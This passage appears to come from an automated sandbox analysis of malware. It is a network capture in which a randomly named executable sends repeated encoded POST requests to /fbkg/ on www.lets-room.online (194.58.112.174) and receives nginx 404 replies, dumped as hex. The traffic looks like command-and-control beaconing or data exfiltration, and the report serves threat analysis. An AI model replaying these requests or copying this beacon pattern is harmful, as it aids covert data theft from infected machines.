6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                23192.168.11.2050150194.58.112.17480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:18.504617929 CET592OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.lets-room.online
                                                                                                                                                                                                Referer: http://www.lets-room.online/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 34 63 65 41 45 71 4c 31 76 72 73 6b 72 63 47 53 6d 36 31 53 57 75 46 73 51 36 6e 66 71 73 39 66 67 72 53 56 64 56 38 34 47 62 74 50 63 4f 31 33 76 65 51 77 55 4b 67 4d 43 63 70 34 47 57 69 78 63 74 50 4e 6e 59 6f 50 58 52 74 30 45 5a 69 52 74 55 66 36 38 51 73 31 30 33 36 68 52 52 6d 5a 34 2b 6f 58 2b 39 73 73 47 35 73 42 70 37 65 78 6d 46 55 34 49 57 6f 4f 4c 2b 58 66 46 6a 59 59 65 44 75 2b 77 69 44 2b 63 63 64 4d 78 2f 30 64 55 4b 46 79 63 37 4d 36 56 72 43 52 4f 30 6e 78 77 36 52 77 7a 47 35 37 74 57 66 6b 4b 76 57 68 5a 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=4ceAEqL1vrskrcGSm61SWuFsQ6nfqs9fgrSVdV84GbtPcO13veQwUKgMCcp4GWixctPNnYoPXRt0EZiRtUf68Qs1036hRRmZ4+oX+9ssG5sBp7exmFU4IWoOL+XfFjYYeDu+wiD+ccdMx/0dUKFyc7M6VrCRO0nxw6RwzG57tWfkKvWhZw==
                                                                                                                                                                                                Nov 17, 2023 19:29:18.719985962 CET593INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:18 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                                                                                                Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                                                                                                Nov 17, 2023 19:29:18.720062971 CET595INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                                                                                                Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                                                                                                Nov 17, 2023 19:29:18.721194029 CET596INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                                                                                                Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                23194.58.112.17480192.168.11.2050150C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:18.504617929 CET592OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.lets-room.online
                                                                                                                                                                                                Referer: http://www.lets-room.online/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 34 63 65 41 45 71 4c 31 76 72 73 6b 72 63 47 53 6d 36 31 53 57 75 46 73 51 36 6e 66 71 73 39 66 67 72 53 56 64 56 38 34 47 62 74 50 63 4f 31 33 76 65 51 77 55 4b 67 4d 43 63 70 34 47 57 69 78 63 74 50 4e 6e 59 6f 50 58 52 74 30 45 5a 69 52 74 55 66 36 38 51 73 31 30 33 36 68 52 52 6d 5a 34 2b 6f 58 2b 39 73 73 47 35 73 42 70 37 65 78 6d 46 55 34 49 57 6f 4f 4c 2b 58 66 46 6a 59 59 65 44 75 2b 77 69 44 2b 63 63 64 4d 78 2f 30 64 55 4b 46 79 63 37 4d 36 56 72 43 52 4f 30 6e 78 77 36 52 77 7a 47 35 37 74 57 66 6b 4b 76 57 68 5a 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=4ceAEqL1vrskrcGSm61SWuFsQ6nfqs9fgrSVdV84GbtPcO13veQwUKgMCcp4GWixctPNnYoPXRt0EZiRtUf68Qs1036hRRmZ4+oX+9ssG5sBp7exmFU4IWoOL+XfFjYYeDu+wiD+ccdMx/0dUKFyc7M6VrCRO0nxw6RwzG57tWfkKvWhZw==
                                                                                                                                                                                                Nov 17, 2023 19:29:18.719985962 CET593INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:18 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                                                                                                Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                                                                                                Nov 17, 2023 19:29:18.720062971 CET595INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                                                                                                Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                                                                                                Nov 17, 2023 19:29:18.721194029 CET596INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                                                                                                Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                24194.58.112.17480192.168.11.2050151C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:21.250534058 CET597OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.lets-room.online
                                                                                                                                                                                                Referer: http://www.lets-room.online/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 34 63 65 41 45 71 4c 31 76 72 73 6b 74 4e 32 53 67 64 4a 53 65 75 46 72 56 36 6e 66 6b 4d 39 62 67 73 61 56 64 55 34 52 47 74 64 50 46 72 4a 33 75 63 34 77 5a 71 67 4d 4e 38 70 35 43 57 69 36 63 71 48 76 6e 59 6b 50 58 51 4a 30 45 72 71 52 71 6b 66 35 6b 41 73 36 78 33 36 67 48 68 6d 44 34 2b 73 68 2b 38 34 73 47 4b 34 42 75 39 79 78 69 55 55 37 4e 32 70 46 61 75 57 4a 4d 44 59 73 65 44 53 49 77 6d 4f 4a 63 4a 56 4d 78 65 55 64 56 4b 46 7a 46 62 4d 35 65 4c 44 62 44 52 2b 6b 38 4b 74 57 7a 47 35 70 6d 6c 79 68 45 4d 33 53 47 32 37 67 70 54 4c 6e 41 6b 36 71 76 31 41 6b 34 46 73 50 33 75 30 36 41 30 4f 6c 6c 69 66 61 6b 49 58 47 6c 56 64 37 58 66 41 58 46 6a 48 33 56 65 56 52 37 65 2f 74 67 31 56 2f 51 62 44 61 75 6e 75 72 43 32 4e 4c 38 39 5a 6b 42 4b 54 35 62 79 74 53 66 57 4b 6b 34 36 4a 4e 45 77 64 36 6c 34 36 4a 45 59 4a 77 2f 2f 55 4c 5a 4c 56 6c 63 49 4a 47 77 49 42 4f 4f 46 53 7a 39 51 51 35 4b 55 4c 4e 6f 76 46 58 67 42 4c 5a 6e 46 43 4c 52 37 4c 59 6e 6e 45 49 46 64 7a 59 6d 75 5a 41 37 2f 38 73 45 39 77 46 32 48 6d 44 6d 58 32 50 72 76 70 6a 4d 30 6f 68 4a 37 69 46 62 69 62 54 6a 65 5a 54 35 6f 4a 52 32 77 67 68 51 2f 39 41 4d 41 49 75 6e 6e 6d 70 48 58 4c 73 45 45 38 30 43 39 48 50 2f 58 52 5a 79 6b 48 53 48 34 52 44 2b 4f 74 46 47 2b 49 50 46 4f 6f 66 75 75 71 39 47 43 48 37 6a 6f 6e 79 56 38 2b 41 41 58 39 6a 68 50 71 30 52 57 6f 34 6e 56 6b 79 4b 2b 66 61 52 35 58 73 70 75 33 54 75 31 75 34 6d 6f 62 74 4f 74 4d 35 70 4a 61 41 62 50 51 50 2f 6f 51 48 57 2f 43 2f 68 52 61 49 55 61 33 43 72 37 72 65 34 68 55 56 76 50 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=4ceAEqL1vrsktN2SgdJSeuFrV6nfkM9bgsaVdU4RGtdPFrJ3uc4wZqgMN8p5CWi6cqHvnYkPXQJ0ErqRqkf5kAs6x36gHhmD4+sh+84sGK4Bu9yxiUU7N2pFauWJMDYseDSIwmOJcJVMxeUdVKFzFbM5eLDbDR+k8KtWzG5pmlyhEM3SG27gpTLnAk6qv1Ak4FsP3u06A0OllifakIXGlVd7XfAXFjH3VeVR7e/tg1V/QbDaunurC2NL89ZkBKT5bytSfWKk46JNEwd6l46JEYJw//ULZLVlcIJGwIBOOFSz9QQ5KULNovFXgBLZnFCLR7LYnnEIFdzYmuZA7/8sE9wF2HmDmX2PrvpjM0ohJ7iFbibTjeZT5oJR2wghQ/9AMAIunnmpHXLsEE80C9HP/XRZykHSH4RD+OtFG+IPFOofuuq9GCH7jonyV8+AAX9jhPq0RWo4nVkyK+faR5Xspu3Tu1u4mobtOtM5pJaAbPQP/oQHW/C/hRaIUa3Cr7re4hUVvPo=
                                                                                                                                                                                                Nov 17, 2023 19:29:21.467825890 CET599INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:21 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 